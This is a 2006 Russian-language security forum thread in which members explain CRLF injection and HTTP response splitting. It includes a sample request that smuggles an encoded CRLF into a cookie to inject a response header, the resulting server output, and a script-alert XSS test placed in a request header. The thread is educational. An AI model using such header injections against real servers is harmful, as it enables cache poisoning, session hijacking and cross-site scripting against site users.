HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу CRLF injection
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

CRLF injection
  #1  
Старый 22.08.2006, 11:32
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
С нами: 10814786

Репутация: 113
По умолчанию CRLF injection
Кто нибудь может обяснить человеческим языком что это такое ?? CRLF injection
Описания на инглишь выгледит так но я не очень то понял что к чему
Я понял только то что типа стырания куков через XSS
Просто названия такое возбуждающее=)) CRLF injection

This script is possibly vulnerable to CRLF injection attacks.

HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure.
HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.
𝕏 Twitter Reddit Telegram Копировать ссылку
 

  #2  
Старый 22.08.2006, 12:13
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию
Привет от blackybr:

http://www.acunetix.com/websitesecurity/crlf-injection.htm
http://www.securiteam.com/securityreviews/5WP022K75O.html
__________________
 

  #3  
Старый 22.08.2006, 12:21
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
С нами: 10814786

Репутация: 113
По умолчанию
Мда...еслиб знал Инглиш гуд то не обратился бы
Все равно спасибо )
А blackybr-а я незнаю ..)
 

  #4  
Старый 22.08.2006, 12:21
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию
GET /index.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (MSIE 6.0; Windows NT 5.0
Host: localhost
Cookie: PHPSESSID=%0d%0aLOL%3ALOL2
Connection: Close
Pragma: no-cache


вернет ответ сервера
HTTP/1.1 200 OK
Date:Tue, 22 Aug 2006 07:54:28 GMT
Server:Apache/1.3.33-Pool-060606.1 (Win32) PHP/4.3.11
X-Powered-By:PHP/4.3.11
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
LOL:LOL2
Pragma:no-cache
Content-Type:text/html
Connection:close
Последний раз редактировалось k1b0rg; 22.08.2006 в 12:24..
 

  #5  
Старый 22.08.2006, 12:35
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
С нами: 10814786

Репутация: 113
По умолчанию
Ну имхо щас уже ясно ...
это типа XSS на апаче

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
Host: http://localhost
Cookie: hotlog=1;path=/
Connection: Close
Expect: <script>alert(Electro)</script>
Pragma: no-cache

Разница получился в том что в CRLF injection идет манупуляция с куками

Все! Ясно! Всем спасибо за ответы
Тему можно закрыть
Последний раз редактировалось Electro; 22.08.2006 в 12:38..
 

  #6  
Старый 22.08.2006, 13:16
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
С нами: 11272646

Репутация: 1384


По умолчанию
>Разница получился в том что в CRLF injection идет манупуляция с куками
не обязательно с куками, суть атаки вообще в том, что при помощь CRLF, тоесть переноса каретки, можно нарушить заголовок.
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 

  #7  
Старый 22.08.2006, 14:28
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
С нами: 10814786

Репутация: 113
По умолчанию
ага...ясно, спасибо большое!
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
XSS или CRLF Injection m0nzt3r Болталка 3 12.04.2005 19:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.